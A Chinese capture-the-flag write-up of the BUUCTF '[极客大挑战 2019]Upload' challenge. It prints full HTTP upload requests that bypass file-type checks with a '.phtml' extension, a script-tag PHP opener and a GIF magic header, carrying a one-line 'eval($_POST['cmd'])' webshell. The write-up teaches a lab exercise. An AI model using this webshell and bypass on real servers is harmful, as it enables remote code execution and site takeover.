题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Upload。
打开环境,如下所示。
通过页面源代码可以发现,该网站系 PHP 架构,因此尝试直接上传一句话木马。
发现提示 "NOT!php!",因此尝试 fuzzing 一下后缀名。
发现网站可以通过了 "phtml" 的后缀名,但是提示文件内容存在字符串 "<?",因此改变文件内容,以其他的形式引入 PHP 代码。
请求包如下。
POST /upload_file.php HTTP/1.1
Host: c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Length: 334
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDI5yLUuOF9usOKnq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="file"; filename="php.phtml"
Content-Type: image/jpeg<script language="php">@eval($_POST['cmd'])</script>
------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="submit"提交
------WebKitFormBoundaryDI5yLUuOF9usOKnq--
发现网站又提示 "Don't lie to me, it's not image at all!!!",而网站检测一个文件是否为图片的方式有许多种,如:
- Content-Type。
- 文件幻数。
- 文件后缀。
- ...。
这里将 GIF 文件的幻数添加入上传的文件的头部,尝试再次上传,请求包如下。
POST /upload_file.php HTTP/1.1
Host: c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Length: 341
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDI5yLUuOF9usOKnq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="file"; filename="php.phtml"
Content-Type: image/jpegGIF98
<script language="php">@eval($_POST['cmd'])</script>
------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="submit"提交
------WebKitFormBoundaryDI5yLUuOF9usOKnq--发现成功上传。
因此直接使用 AntSword 连接一句话木马即可获得 WebShell(注意,成功上传的文件放置在 /upload 文件夹下)。
![[SUCTF 2019]EasySQL](https://img2024.cnblogs.com/blog/3549480/202411/3549480-20241102231324332-864607604.png)
![[极客大挑战 2019]LoveSQL](https://img2024.cnblogs.com/blog/3549480/202411/3549480-20241102231608568-1930947788.png)
![[BUUCTF]disk](https://img2023.cnblogs.com/blog/3511078/202411/3511078-20241102224750019-861808137.png)
